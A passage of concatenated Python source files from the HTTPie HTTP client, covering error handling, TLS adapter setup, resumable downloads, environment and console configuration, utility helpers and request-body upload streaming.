env.stderr.write('\n') if include_traceback: raise exit_status = ExitStatus.ERROR except requests.Timeout: exit_status = ExitStatus.ERROR_TIMEOUT env.log_error(f'Request timed out ({parsed_args.timeout}s).') except requests.TooManyRedirects: exit_status = ExitStatus.ERROR_TOO_MANY_REDIRECTS env.log_error( f'Too many redirects' f' (--max-redirects={parsed_args.max_redirects}).' ) except requests.exceptions.ConnectionError as exc: annotation = None original_exc = unwrap_context(exc) if isinstance(original_exc, socket.gaierror): if original_exc.errno == socket.EAI_AGAIN: annotation = '\nCouldn’t connect to a DNS server. Please check your connection and try again.' elif original_exc.errno == socket.EAI_NONAME: annotation = '\nCouldn’t resolve the given hostname. Please check the URL and try again.' 
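                # For DNS-level failures, propagate the underlying
                # socket.gaierror rather than the wrapping ConnectionError, so
                # the logged error names the more specific cause.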
propagated_exc = original_exc else: propagated_exc = exc handle_generic_error(propagated_exc, annotation=annotation) exit_status = ExitStatus.ERROR except Exception as e: # TODO: Further distinction between expected and unexpected errors. handle_generic_error(e) exit_status = ExitStatus.ERROR return exit_status def main( args: List[Union[str, bytes]] = sys.argv, env: Environment = Environment() ) -> ExitStatus: """ The main function. Pre-process args, handle some special types of invocations, and run the main program with error handling. Return exit status code. """ from .cli.definition import parser return raw_main( parser=parser, main_program=program, args=args, env=env ) def program(args: argparse.Namespace, env: Environment) -> ExitStatus: """ The main program without error handling. """ # TODO: Refactor and drastically simplify, especially so that the separator logic is elsewhere. exit_status = ExitStatus.SUCCESS downloader = None initial_request: Optional[requests.PreparedRequest] = None final_response: Optional[requests.Response] = None processing_options = ProcessingOptions.from_raw_args(args) def separate(): getattr(env.stdout, 'buffer', env.stdout).write(MESSAGE_SEPARATOR_BYTES) def request_body_read_callback(chunk: bytes): should_pipe_to_stdout = bool( # Request body output desired OUT_REQ_BODY in args.output_options # & not `.read()` already pre-request (e.g., for compression) and initial_request # & non-EOF chunk and chunk ) if should_pipe_to_stdout: return write_raw_data( env, chunk, processing_options=processing_options, headers=initial_request.headers ) try: if args.download: args.follow = True # --download implies --follow. downloader = Downloader(env, output_file=args.output_file, resume=args.download_resume) downloader.pre_request(args.headers) messages = collect_messages(env, args=args, request_body_read_callback=request_body_read_callback) force_separator = False prev_with_body = False # Process messages as they’re generated for message in messages: output_options = OutputOptions.from_message(message, args.output_options) do_write_body = output_options.body if prev_with_body and output_options.any() and (force_separator or not env.stdout_isatty): # Separate after a previous message with body, if needed. See test_tokens.py. separate() force_separator = False if output_options.kind is RequestsMessageKind.REQUEST: if not initial_request: initial_request = message if output_options.body: is_streamed_upload = not isinstance(message.body, (str, bytes)) do_write_body = not is_streamed_upload force_separator = is_streamed_upload and env.stdout_isatty else: final_response = message if args.check_status or downloader: exit_status = http_status_to_exit_status(http_status=message.status_code, follow=args.follow) if exit_status != ExitStatus.SUCCESS and (not env.stdout_isatty or args.quiet == 1): env.log_error(f'HTTP {message.raw.status} {message.raw.reason}', level=LogLevel.WARNING) write_message( requests_message=message, env=env, output_options=output_options._replace( body=do_write_body ), processing_options=processing_options ) prev_with_body = output_options.body # Cleanup if force_separator: separate() if downloader and exit_status == ExitStatus.SUCCESS: # Last response body download. 
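            # downloader.start() wraps the final response body in a RawStream
            # with a progress callback and picks/opens the output file;
            # downloader.interrupted later compares the downloaded size against
            # the expected total to flag truncated transfers.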
download_stream, download_to = downloader.start( initial_url=initial_request.url, final_response=final_response, ) write_stream(stream=download_stream, outfile=download_to, flush=False) downloader.finish() if downloader.interrupted: exit_status = ExitStatus.ERROR env.log_error( f'Incomplete download: size={downloader.status.total_size};' f' downloaded={downloader.status.downloaded}' ) return exit_status finally: if downloader and not downloader.finished: downloader.failed() if args.output_file and args.output_file_specified: args.output_file.close() def print_debug_info(env: Environment): env.stderr.writelines([ f'HTTPie {httpie_version}\n', f'Requests {requests_version}\n', f'Pygments {pygments_version}\n', f'Python {sys.version}\n{sys.executable}\n', f'{platform.system()} {platform.release()}', ]) env.stderr.write('\n\n') env.stderr.write(repr(env)) env.stderr.write('\n\n') env.stderr.write(repr(plugin_manager)) env.stderr.write('\n') def decode_raw_args( args: List[Union[str, bytes]], stdin_encoding: str ) -> List[str]: """ Convert all bytes args to str by decoding them using stdin encoding. """ return [ arg.decode(stdin_encoding) if type(arg) is bytes else arg for arg in args ] File: httpie/ssl_.py import ssl from typing import NamedTuple, Optional from httpie.adapters import HTTPAdapter # noinspection PyPackageRequirements from urllib3.util.ssl_ import ( create_urllib3_context, resolve_ssl_version, ) SSL_VERSION_ARG_MAPPING = { 'ssl2.3': 'PROTOCOL_SSLv23', 'ssl3': 'PROTOCOL_SSLv3', 'tls1': 'PROTOCOL_TLSv1', 'tls1.1': 'PROTOCOL_TLSv1_1', 'tls1.2': 'PROTOCOL_TLSv1_2', 'tls1.3': 'PROTOCOL_TLSv1_3', } AVAILABLE_SSL_VERSION_ARG_MAPPING = { arg: getattr(ssl, constant_name) for arg, constant_name in SSL_VERSION_ARG_MAPPING.items() if hasattr(ssl, constant_name) } class HTTPieCertificate(NamedTuple): cert_file: Optional[str] = None key_file: Optional[str] = None key_password: Optional[str] = None def to_raw_cert(self): """Synthesize a requests-compatible (2-item tuple of cert and key file) object from HTTPie's internal representation of a certificate.""" return (self.cert_file, self.key_file) class HTTPieHTTPSAdapter(HTTPAdapter): def __init__( self, verify: bool, ssl_version: str = None, ciphers: str = None, **kwargs ): self._ssl_context = self._create_ssl_context( verify=verify, ssl_version=ssl_version, ciphers=ciphers, ) super().__init__(**kwargs) def init_poolmanager(self, *args, **kwargs): kwargs['ssl_context'] = self._ssl_context return super().init_poolmanager(*args, **kwargs) def proxy_manager_for(self, *args, **kwargs): kwargs['ssl_context'] = self._ssl_context return super().proxy_manager_for(*args, **kwargs) def cert_verify(self, conn, url, verify, cert): if isinstance(cert, HTTPieCertificate): conn.key_password = cert.key_password cert = cert.to_raw_cert() return super().cert_verify(conn, url, verify, cert) @staticmethod def _create_ssl_context( verify: bool, ssl_version: str = None, ciphers: str = None, ) -> 'ssl.SSLContext': return create_urllib3_context( ciphers=ciphers, ssl_version=resolve_ssl_version(ssl_version), # Since we are using a custom SSL context, we need to pass this # here manually, even though it’s also passed to the connection # in `super().cert_verify()`. cert_reqs=ssl.CERT_REQUIRED if verify else ssl.CERT_NONE ) @classmethod def get_default_ciphers_names(cls): return [cipher['name'] for cipher in cls._create_ssl_context(verify=False).get_ciphers()] def _is_key_file_encrypted(key_file): """Detects if a key file is encrypted or not. 
Copy of the internal urllib function (urllib3.util.ssl_)""" with open(key_file, "r") as f: for line in f: # Look for Proc-Type: 4,ENCRYPTED if "ENCRYPTED" in line: return True return False # We used to import the default set of TLS ciphers from urllib3, but they removed it. # Instead, now urllib3 uses the list of ciphers configured by the system. # <https://github.com/httpie/cli/pull/1501> DEFAULT_SSL_CIPHERS_STRING = ':'.join(HTTPieHTTPSAdapter.get_default_ciphers_names()) File: httpie/downloads.py """ Download mode implementation. """ import mimetypes import os import re from mailbox import Message from time import monotonic from typing import IO, Optional, Tuple from urllib.parse import urlsplit import requests from .models import HTTPResponse, OutputOptions from .output.streams import RawStream from .context import Environment PARTIAL_CONTENT = 206 class ContentRangeError(ValueError): pass def parse_content_range(content_range: str, resumed_from: int) -> int: """ Parse and validate Content-Range header. <https://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html> :param content_range: the value of a Content-Range response header eg. "bytes 21010-47021/47022" :param resumed_from: first byte pos. from the Range request header :return: total size of the response body when fully downloaded. """ if content_range is None: raise ContentRangeError('Missing Content-Range') pattern = ( r'^bytes (?P<first_byte_pos>\d+)-(?P<last_byte_pos>\d+)' r'/(\*|(?P<instance_length>\d+))$' ) match = re.match(pattern, content_range) if not match: raise ContentRangeError( f'Invalid Content-Range format {content_range!r}') content_range_dict = match.groupdict() first_byte_pos = int(content_range_dict['first_byte_pos']) last_byte_pos = int(content_range_dict['last_byte_pos']) instance_length = ( int(content_range_dict['instance_length']) if content_range_dict['instance_length'] else None ) # "A byte-content-range-spec with a byte-range-resp-spec whose # last- byte-pos value is less than its first-byte-pos value, # or whose instance-length value is less than or equal to its # last-byte-pos value, is invalid. The recipient of an invalid # byte-content-range- spec MUST ignore it and any content # transferred along with it." if (first_byte_pos > last_byte_pos or (instance_length is not None and instance_length <= last_byte_pos)): raise ContentRangeError( f'Invalid Content-Range returned: {content_range!r}') if (first_byte_pos != resumed_from or (instance_length is not None and last_byte_pos + 1 != instance_length)): # Not what we asked for. raise ContentRangeError( f'Unexpected Content-Range returned ({content_range!r})' f' for the requested Range ("bytes={resumed_from}-")' ) return last_byte_pos + 1 def filename_from_content_disposition( content_disposition: str ) -> Optional[str]: """ Extract and validate filename from a Content-Disposition header. :param content_disposition: Content-Disposition value :return: the filename if present and valid, otherwise `None` """ # attachment; filename=jakubroztocil-httpie-0.4.1-20-g40bd8f6.tar.gz msg = Message(f'Content-Disposition: {content_disposition}') filename = msg.get_filename() if filename: # Basic sanitation. filename = os.path.basename(filename).lstrip('.').strip() if filename: return filename def filename_from_url(url: str, content_type: Optional[str]) -> str: fn = urlsplit(url).path.rstrip('/') fn = os.path.basename(fn) if fn else 'index' if '.' 
not in fn and content_type: content_type = content_type.split(';')[0] if content_type == 'text/plain': # mimetypes returns '.ksh' ext = '.txt' else: ext = mimetypes.guess_extension(content_type) if ext == '.htm': ext = '.html' if ext: fn += ext return fn def trim_filename(filename: str, max_len: int) -> str: if len(filename) > max_len: trim_by = len(filename) - max_len name, ext = os.path.splitext(filename) if trim_by >= len(name): filename = filename[:-trim_by] else: filename = name[:-trim_by] + ext return filename def get_filename_max_length(directory: str) -> int: max_len = 255 if hasattr(os, 'pathconf') and 'PC_NAME_MAX' in os.pathconf_names: max_len = os.pathconf(directory, 'PC_NAME_MAX') return max_len def trim_filename_if_needed(filename: str, directory='.', extra=0) -> str: max_len = get_filename_max_length(directory) - extra if len(filename) > max_len: filename = trim_filename(filename, max_len) return filename def get_unique_filename(filename: str, exists=os.path.exists) -> str: attempt = 0 while True: suffix = f'-{attempt}' if attempt > 0 else '' try_filename = trim_filename_if_needed(filename, extra=len(suffix)) try_filename += suffix if not exists(try_filename): return try_filename attempt += 1 class Downloader: def __init__( self, env: Environment, output_file: IO = None, resume: bool = False ): """ :param resume: Should the download resume if partial download already exists. :param output_file: The file to store response body in. If not provided, it will be guessed from the response. :param progress_file: Where to report download progress. """ self.finished = False self.status = DownloadStatus(env=env) self._output_file = output_file self._resume = resume self._resumed_from = 0 def pre_request(self, request_headers: dict): """Called just before the HTTP request is sent. Might alter `request_headers`. """ # Ask the server not to encode the content so that we can resume, etc. request_headers['Accept-Encoding'] = 'identity' if self._resume: bytes_have = os.path.getsize(self._output_file.name) if bytes_have: # Set ``Range`` header to resume the download # TODO: Use "If-Range: mtime" to make sure it's fresh? request_headers['Range'] = f'bytes={bytes_have}-' self._resumed_from = bytes_have def start( self, initial_url: str, final_response: requests.Response ) -> Tuple[RawStream, IO]: """ Initiate and return a stream for `response` body with progress callback attached. Can be called only once. 
:param initial_url: The original requested URL :param final_response: Initiated response object with headers already fetched :return: RawStream, output_file """ assert not self.status.time_started # FIXME: some servers still might sent Content-Encoding: gzip # <https://github.com/httpie/cli/issues/423> try: total_size = int(final_response.headers['Content-Length']) except (KeyError, ValueError, TypeError): total_size = None if not self._output_file: self._output_file = self._get_output_file_from_response( initial_url=initial_url, final_response=final_response, ) else: # `--output, -o` provided if self._resume and final_response.status_code == PARTIAL_CONTENT: total_size = parse_content_range( final_response.headers.get('Content-Range'), self._resumed_from ) else: self._resumed_from = 0 try: self._output_file.seek(0) self._output_file.truncate() except OSError: pass # stdout output_options = OutputOptions.from_message(final_response, headers=False, body=True) stream = RawStream( msg=HTTPResponse(final_response), output_options=output_options, on_body_chunk_downloaded=self.chunk_downloaded, ) self.status.started( output_file=self._output_file, resumed_from=self._resumed_from, total_size=total_size ) return stream, self._output_file def finish(self): assert not self.finished self.finished = True self.status.finished() def failed(self): self.status.terminate() @property def interrupted(self) -> bool: return ( self.finished and self.status.total_size and self.status.total_size != self.status.downloaded ) def chunk_downloaded(self, chunk: bytes): """ A download progress callback. :param chunk: A chunk of response body data that has just been downloaded and written to the output. """ self.status.chunk_downloaded(len(chunk)) @staticmethod def _get_output_file_from_response( initial_url: str, final_response: requests.Response, ) -> IO: # Output file not specified. Pick a name that doesn't exist yet. filename = None if 'Content-Disposition' in final_response.headers: filename = filename_from_content_disposition( final_response.headers['Content-Disposition']) if not filename: filename = filename_from_url( url=initial_url, content_type=final_response.headers.get('Content-Type'), ) unique_filename = get_unique_filename(filename) return open(unique_filename, buffering=0, mode='a+b') class DownloadStatus: """Holds details about the download status.""" def __init__(self, env): self.env = env self.downloaded = 0 self.total_size = None self.resumed_from = 0 self.time_started = None self.time_finished = None def started(self, output_file, resumed_from=0, total_size=None): assert self.time_started is None self.total_size = total_size self.downloaded = self.resumed_from = resumed_from self.time_started = monotonic() self.start_display(output_file=output_file) def start_display(self, output_file): from httpie.output.ui.rich_progress import ( DummyDisplay, StatusDisplay, ProgressDisplay ) message = f'Downloading to {output_file.name}' if self.env.show_displays: if self.total_size is None: # Rich does not support progress bars without a total # size given. Instead we use status objects. 
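                # (i.e. a live status message rather than a percentage-based bar)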
self.display = StatusDisplay(self.env) else: self.display = ProgressDisplay(self.env) else: self.display = DummyDisplay(self.env) self.display.start( total=self.total_size, at=self.downloaded, description=message ) def chunk_downloaded(self, size): assert self.time_finished is None self.downloaded += size self.display.update(size) @property def has_finished(self): return self.time_finished is not None @property def time_spent(self): if ( self.time_started is not None and self.time_finished is not None ): return self.time_finished - self.time_started else: return None def finished(self): assert self.time_started is not None assert self.time_finished is None self.time_finished = monotonic() if hasattr(self, 'display'): self.display.stop(self.time_spent) def terminate(self): if hasattr(self, 'display'): self.display.stop(self.time_spent) File: httpie/context.py import argparse import sys import os import warnings from contextlib import contextmanager from pathlib import Path from typing import Iterator, IO, Optional, TYPE_CHECKING from enum import Enum try: import curses except ImportError: curses = None # Compiled w/o curses from .compat import is_windows, cached_property from .config import DEFAULT_CONFIG_DIR, Config, ConfigFileError from .encoding import UTF8 from .utils import repr_dict from .output.ui.palette import GenericColor if TYPE_CHECKING: from rich.console import Console class LogLevel(str, Enum): INFO = 'info' WARNING = 'warning' ERROR = 'error' LOG_LEVEL_COLORS = { LogLevel.INFO: GenericColor.PINK, LogLevel.WARNING: GenericColor.ORANGE, LogLevel.ERROR: GenericColor.RED, } LOG_LEVEL_DISPLAY_THRESHOLDS = { LogLevel.INFO: 1, LogLevel.WARNING: 2, LogLevel.ERROR: float('inf'), # Never hide errors. } class Environment: """ Information about the execution context (standard streams, config directory, etc). By default, it represents the actual environment. All of the attributes can be overwritten though, which is used by the test suite to simulate various scenarios. """ args = argparse.Namespace() is_windows: bool = is_windows config_dir: Path = DEFAULT_CONFIG_DIR stdin: Optional[IO] = sys.stdin # `None` when closed fd (#791) stdin_isatty: bool = stdin.isatty() if stdin else False stdin_encoding: str = None stdout: IO = sys.stdout stdout_isatty: bool = stdout.isatty() stdout_encoding: str = None stderr: IO = sys.stderr stderr_isatty: bool = stderr.isatty() colors = 256 program_name: str = 'http' # Whether to show progress bars / status spinners etc. show_displays: bool = True if not is_windows: if curses: try: curses.setupterm() colors = curses.tigetnum('colors') except curses.error: pass else: # noinspection PyUnresolvedReferences import colorama.initialise stdout = colorama.initialise.wrap_stream( stdout, convert=None, strip=None, autoreset=True, wrap=True ) stderr = colorama.initialise.wrap_stream( stderr, convert=None, strip=None, autoreset=True, wrap=True ) del colorama def __init__(self, devnull=None, **kwargs): """ Use keyword arguments to overwrite any of the class attributes for this instance. """ assert all(hasattr(type(self), attr) for attr in kwargs.keys()) self.__dict__.update(**kwargs) # The original STDERR unaffected by --quiet’ing. 
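        # log_error() falls back to this stream, so errors stay visible even
        # after self.stderr has been swapped out (e.g. by as_silent()).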
self._orig_stderr = self.stderr self._devnull = devnull # Keyword arguments > stream.encoding > default UTF-8 if self.stdin and self.stdin_encoding is None: self.stdin_encoding = getattr( self.stdin, 'encoding', None) or UTF8 if self.stdout_encoding is None: actual_stdout = self.stdout if is_windows: # noinspection PyUnresolvedReferences from colorama import AnsiToWin32 if isinstance(self.stdout, AnsiToWin32): # noinspection PyUnresolvedReferences actual_stdout = self.stdout.wrapped self.stdout_encoding = getattr( actual_stdout, 'encoding', None) or UTF8 self.quiet = kwargs.pop('quiet', 0) def __str__(self): defaults = dict(type(self).__dict__) actual = dict(defaults) actual.update(self.__dict__) actual['config'] = self.config return repr_dict({ key: value for key, value in actual.items() if not key.startswith('_') }) def __repr__(self): return f'<{type(self).__name__} {self}>' _config: Config = None @property def config(self) -> Config: config = self._config if not config: self._config = config = Config(directory=self.config_dir) if not config.is_new(): try: config.load() except ConfigFileError as e: self.log_error(e, level=LogLevel.WARNING) return config @property def devnull(self) -> IO: if self._devnull is None: self._devnull = open(os.devnull, 'w+') return self._devnull @contextmanager def as_silent(self) -> Iterator[None]: original_stdout = self.stdout original_stderr = self.stderr try: self.stdout = self.devnull self.stderr = self.devnull yield finally: self.stdout = original_stdout self.stderr = original_stderr def log_error(self, msg: str, level: LogLevel = LogLevel.ERROR) -> None: if self.stdout_isatty and self.quiet >= LOG_LEVEL_DISPLAY_THRESHOLDS[level]: stderr = self.stderr # Not directly /dev/null, since stderr might be mocked else: stderr = self._orig_stderr rich_console = self._make_rich_console(file=stderr, force_terminal=stderr.isatty()) rich_console.print( f'\n{self.program_name}: {level.value}: {msg}\n\n', style=LOG_LEVEL_COLORS[level], markup=False, highlight=False, soft_wrap=True ) def apply_warnings_filter(self) -> None: if self.quiet >= LOG_LEVEL_DISPLAY_THRESHOLDS[LogLevel.WARNING]: warnings.simplefilter("ignore") def _make_rich_console( self, file: IO[str], force_terminal: bool ) -> 'Console': from rich.console import Console from httpie.output.ui.rich_palette import _make_rich_color_theme style = getattr(self.args, 'style', None) theme = _make_rich_color_theme(style) # Rich infers the rest of the knowledge (e.g encoding) # dynamically by looking at the file/stderr. return Console( file=file, force_terminal=force_terminal, no_color=(self.colors == 0), theme=theme ) # Rich recommends separating the actual console (stdout) from # the error (stderr) console for better isolation between parts. 
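    # The two cached properties below follow that advice; each console is
    # created at most once per Environment instance. See: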
# https://rich.readthedocs.io/en/stable/console.html#error-console @cached_property def rich_console(self): return self._make_rich_console(self.stdout, self.stdout_isatty) @cached_property def rich_error_console(self): return self._make_rich_console(self.stderr, self.stderr_isatty) File: httpie/utils.py import os import base64 import json import mimetypes import re import sys import time import tempfile import sysconfig from collections import OrderedDict from contextlib import contextmanager from http.cookiejar import parse_ns_headers from pathlib import Path from pprint import pformat from urllib.parse import urlsplit from typing import Any, List, Optional, Tuple, Generator, Callable, Iterable, IO, TypeVar import requests.auth RE_COOKIE_SPLIT = re.compile(r', (?=[^ ;]+=)') Item = Tuple[str, Any] Items = List[Item] T = TypeVar("T") class JsonDictPreservingDuplicateKeys(OrderedDict): """A specialized JSON dict preserving duplicate keys.""" # Python versions prior to 3.8 suffer from an issue with multiple keys with the same name. # `json.dumps(obj, indent=N, sort_keys=True)` will output sorted keys when they are unique, and # duplicate keys will be outputted as they were defined in the original data. # See <https://bugs.python.org/issue23493#msg400929> for the behavior change between Python versions. SUPPORTS_SORTING = sys.version_info >= (3, 8) def __init__(self, items: Items): self._items = items self._ensure_items_used() def _ensure_items_used(self) -> None: """HACK: Force `json.dumps()` to use `self.items()` instead of an empty dict. Two JSON encoders are available on CPython: pure-Python (1) and C (2) implementations. (1) The pure-python implementation will do a simple `if not dict: return '{}'`, and we could fake that check by implementing the `__bool__()` method. Source: - <https://github.com/python/cpython/blob/9d318ad/Lib/json/encoder.py#L334-L336> (2) On the other hand, the C implementation will do a check on the number of items contained inside the dict, using a verification on `dict->ma_used`, which is updated only when an item is added/removed from the dict. For that case, there is no workaround but to add an item into the dict. Sources: - <https://github.com/python/cpython/blob/9d318ad/Modules/_json.c#L1581-L1582> - <https://github.com/python/cpython/blob/9d318ad/Include/cpython/dictobject.h#L53> - <https://github.com/python/cpython/blob/9d318ad/Include/cpython/dictobject.h#L17-L18> To please both implementations, we simply add one item to the dict. """ if self._items: self['__hack__'] = '__hack__' def items(self) -> Items: """Return all items, duplicate ones included. """ return self._items def load_json_preserve_order_and_dupe_keys(s): return json.loads(s, object_pairs_hook=JsonDictPreservingDuplicateKeys) def repr_dict(d: dict) -> str: return pformat(d) def humanize_bytes(n, precision=2): # Author: Doug Latornell # Licence: MIT # URL: https://code.activestate.com/recipes/577081/ """Return a humanized string representation of a number of bytes. 
>>> humanize_bytes(1) '1 B' >>> humanize_bytes(1024, precision=1) '1.0 kB' >>> humanize_bytes(1024 * 123, precision=1) '123.0 kB' >>> humanize_bytes(1024 * 12342, precision=1) '12.1 MB' >>> humanize_bytes(1024 * 12342, precision=2) '12.05 MB' >>> humanize_bytes(1024 * 1234, precision=2) '1.21 MB' >>> humanize_bytes(1024 * 1234 * 1111, precision=2) '1.31 GB' >>> humanize_bytes(1024 * 1234 * 1111, precision=1) '1.3 GB' """ abbrevs = [ (1 << 50, 'PB'), (1 << 40, 'TB'), (1 << 30, 'GB'), (1 << 20, 'MB'), (1 << 10, 'kB'), (1, 'B') ] if n == 1: return '1 B' for factor, suffix in abbrevs: if n >= factor: break # noinspection PyUnboundLocalVariable return f'{n / factor:.{precision}f} {suffix}' class ExplicitNullAuth(requests.auth.AuthBase): """Forces requests to ignore the ``.netrc``. <https://github.com/psf/requests/issues/2773#issuecomment-174312831> """ def __call__(self, r): return r def get_content_type(filename): """ Return the content type for ``filename`` in format appropriate for Content-Type headers, or ``None`` if the file type is unknown to ``mimetypes``. """ return mimetypes.guess_type(filename, strict=False)[0] def split_cookies(cookies): """ When ``requests`` stores cookies in ``response.headers['Set-Cookie']`` it concatenates all of them through ``, ``. This function splits cookies apart being careful to not to split on ``, `` which may be part of cookie value. """ if not cookies: return [] return RE_COOKIE_SPLIT.split(cookies) def get_expired_cookies( cookies: str, now: float = None ) -> List[dict]: now = now or time.time() def is_expired(expires: Optional[float]) -> bool: return expires is not None and expires <= now attr_sets: List[Tuple[str, str]] = parse_ns_headers( split_cookies(cookies) ) cookies = [ # The first attr name is the cookie name. dict(attrs[1:], name=attrs[0][0]) for attrs in attr_sets ] _max_age_to_expires(cookies=cookies, now=now) return [ { 'name': cookie['name'], 'path': cookie.get('path', '/') } for cookie in cookies if is_expired(expires=cookie.get('expires')) ] def _max_age_to_expires(cookies, now): """ Translate `max-age` into `expires` for Requests to take it into account. 
HACK/FIXME: <https://github.com/psf/requests/issues/5743> """ for cookie in cookies: if 'expires' in cookie: continue max_age = cookie.get('max-age') if max_age and max_age.isdigit(): cookie['expires'] = now + float(max_age) def parse_content_type_header(header): """Borrowed from requests.""" tokens = header.split(';') content_type, params = tokens[0].strip(), tokens[1:] params_dict = {} items_to_strip = "\"' " for param in params: param = param.strip() if param: key, value = param, True index_of_equals = param.find("=") if index_of_equals != -1: key = param[:index_of_equals].strip(items_to_strip) value = param[index_of_equals + 1:].strip(items_to_strip) params_dict[key.lower()] = value return content_type, params_dict def as_site(path: Path, **extra_vars) -> Path: site_packages_path = sysconfig.get_path( 'purelib', vars={'base': str(path), **extra_vars} ) return Path(site_packages_path) def get_site_paths(path: Path) -> Iterable[Path]: from httpie.compat import ( MIN_SUPPORTED_PY_VERSION, MAX_SUPPORTED_PY_VERSION, is_frozen ) if is_frozen: [major, min_minor] = MIN_SUPPORTED_PY_VERSION [major, max_minor] = MAX_SUPPORTED_PY_VERSION for minor in range(min_minor, max_minor + 1): yield as_site( path, py_version_short=f'{major}.{minor}' ) else: yield as_site(path) def split_iterable(iterable: Iterable[T], key: Callable[[T], bool]) -> Tuple[List[T], List[T]]: left, right = [], [] for item in iterable: if key(item): left.append(item) else: right.append(item) return left, right def unwrap_context(exc: Exception) -> Optional[Exception]: context = exc.__context__ if isinstance(context, Exception): return unwrap_context(context) else: return exc def url_as_host(url: str) -> str: return urlsplit(url).netloc.split('@')[-1] class LockFileError(ValueError): pass @contextmanager def open_with_lockfile(file: Path, *args, **kwargs) -> Generator[IO[Any], None, None]: file_id = base64.b64encode(os.fsencode(file)).decode() target_file = Path(tempfile.gettempdir()) / file_id # Have an atomic-like touch here, so we'll tighten the possibility of # a race occurring between multiple processes accessing the same file. try: target_file.touch(exist_ok=False) except FileExistsError as exc: raise LockFileError("Can't modify a locked file.") from exc try: with open(file, *args, **kwargs) as stream: yield stream finally: target_file.unlink() def is_version_greater(version_1: str, version_2: str) -> bool: # In an ideal scenario, we would depend on `packaging` in order # to offer PEP 440 compatible parsing. But since it might not be # commonly available for outside packages, and since we are only # going to parse HTTPie's own version it should be fine to compare # this in a SemVer subset fashion. 
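    # A rough sketch of the resulting behaviour (values are illustrative):
    #   is_version_greater('3.2.3', '3.2')    -> (3, 2, 3) > (3, 2) -> True
    #   is_version_greater('3.2', '3.2.0b1')  -> (3, 2) > (3, 2)    -> False
    # Non-numeric parts stop the parse, so pre-release suffixes are dropped.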
def split_version(version: str) -> Tuple[int, ...]: parts = [] for part in version.split('.')[:3]: try: parts.append(int(part)) except ValueError: break return tuple(parts) return split_version(version_1) > split_version(version_2) File: httpie/uploads.py import sys import os import zlib import functools import threading from typing import Any, Callable, IO, Iterable, Optional, Tuple, Union, TYPE_CHECKING from urllib.parse import urlencode import requests from requests.utils import super_len if TYPE_CHECKING: from requests_toolbelt import MultipartEncoder from .context import Environment from .cli.dicts import MultipartRequestDataDict, RequestDataDict from .compat import is_windows class ChunkedStream: def __iter__(self) -> Iterable[Union[str, bytes]]: raise NotImplementedError class ChunkedUploadStream(ChunkedStream): def __init__( self, stream: Iterable, callback: Callable, event: Optional[threading.Event] = None ) -> None: self.callback = callback self.stream = stream self.event = event def __iter__(self) -> Iterable[Union[str, bytes]]: for chunk in self.stream: if self.event: self.event.set() self.callback(chunk) yield chunk class ChunkedMultipartUploadStream(ChunkedStream): chunk_size = 100 * 1024 def __init__( self, encoder: 'MultipartEncoder', event: Optional[threading.Event] = None ) -> None: self.encoder = encoder self.event = event def __iter__(self) -> Iterable[Union[str, bytes]]: while True: chunk = self.encoder.read(self.chunk_size) if self.event: self.event.set() if not chunk: break yield chunk def as_bytes(data: Union[str, bytes]) -> bytes: if isinstance(data, str): return data.encode() else: return data CallbackT = Callable[[bytes], bytes] def _wrap_function_with_callback( func: Callable[..., Any], callback: CallbackT ) -> Callable[..., Any]: @functools.wraps(func) def wrapped(*args, **kwargs): chunk = func(*args, **kwargs) callback(chunk) return chunk return wrapped def is_stdin(file: IO) -> bool: try: file_no = file.fileno() except Exception: return False else: return file_no == sys.stdin.fileno() READ_THRESHOLD = float(os.getenv('HTTPIE_STDIN_READ_WARN_THRESHOLD', 10.0)) def observe_stdin_for_data_thread(env: Environment, file: IO, read_event: threading.Event) -> None: # Windows unfortunately does not support select() operation # on regular files, like stdin in our use case. # https://docs.python.org/3/library/select.html#select.select if is_windows: return None # If the user configures READ_THRESHOLD to be 0, then # disable this warning. if READ_THRESHOLD == 0: return None def worker(event: threading.Event) -> None: if not event.wait(timeout=READ_THRESHOLD): env.stderr.write( f'> warning: no stdin data read in {READ_THRESHOLD}s ' f'(perhaps you want to --ignore-stdin)\n' f'> See: https://httpie.io/docs/cli/best-practices\n' ) # Making it a daemon ensures that if the user exits from the main program # (e.g. either regularly or with Ctrl-C), the thread will not # block them. thread = threading.Thread( target=worker, args=(read_event,), daemon=True ) thread.start() def _read_file_with_selectors(file: IO, read_event: threading.Event) -> bytes: if is_windows or not is_stdin(file): return as_bytes(file.read()) import select # Try checking whether there is any incoming data for READ_THRESHOLD # seconds. If there isn't anything in the given period, issue # a warning about a misusage. 
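    # select() returns an empty readable list on timeout; in that case
    # `read_event` stays unset, letting the timer thread started by
    # observe_stdin_for_data_thread() print its warning, while the blocking
    # file.read() below still waits for the data.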
read_selectors, _, _ = select.select([file], [], [], READ_THRESHOLD) if read_selectors: read_event.set() return as_bytes(file.read()) def _prepare_file_for_upload( env: Environment, file: Union[IO, 'MultipartEncoder'], callback: CallbackT, chunked: bool = False, content_length_header_value: Optional[int] = None, ) -> Union[bytes, IO, ChunkedStream]: read_event = threading.Event() if not super_len(file): if is_stdin(file): observe_stdin_for_data_thread(env, file, read_event) # Zero-length -> assume stdin. if content_length_header_value is None and not chunked: # Read the whole stdin to determine `Content-Length`. # # TODO: Instead of opt-in --chunked, consider making # `Transfer-Encoding: chunked` for STDIN opt-out via # something like --no-chunked. # This would be backwards-incompatible so wait until v3.0.0. # file = _read_file_with_selectors(file, read_event) else: file.read = _wrap_function_with_callback( file.read, callback ) if chunked: from requests_toolbelt import MultipartEncoder if isinstance(file, MultipartEncoder): return ChunkedMultipartUploadStream( encoder=file, event=read_event, ) else: return ChunkedUploadStream( stream=file, callback=callback, event=read_event ) else: return file def prepare_request_body( env: Environment, raw_body: Union[str, bytes, IO, 'MultipartEncoder', RequestDataDict], body_read_callback: CallbackT, offline: bool = False, chunked: bool = False, content_length_header_value: Optional[int] = None, ) -> Union[bytes, IO, 'MultipartEncoder', ChunkedStream]: is_file_like = hasattr(raw_body, 'read') if isinstance(raw_body, (bytes, str)): body = as_bytes(raw_body) elif isinstance(raw_body, RequestDataDict): body = as_bytes(urlencode(raw_body, doseq=True)) else: body = raw_body if offline: if is_file_like: return as_bytes(raw_body.read()) else: return body if is_file_like: return _prepare_file_for_upload( env, body, chunked=chunked, callback=body_read_callback, content_length_header_value=content_length_header_value ) elif chunked: return ChunkedUploadStream( stream=iter([body]), callback=body_read_callback ) else: return body def get_multipart_data_and_content_type( data: MultipartRequestDataDict, boundary: str = None, content_type: str = None, ) -> Tuple['MultipartEncoder', str]: from requests_toolbelt import MultipartEncoder encoder = MultipartEncoder( fields=data.items(), boundary=boundary, ) if 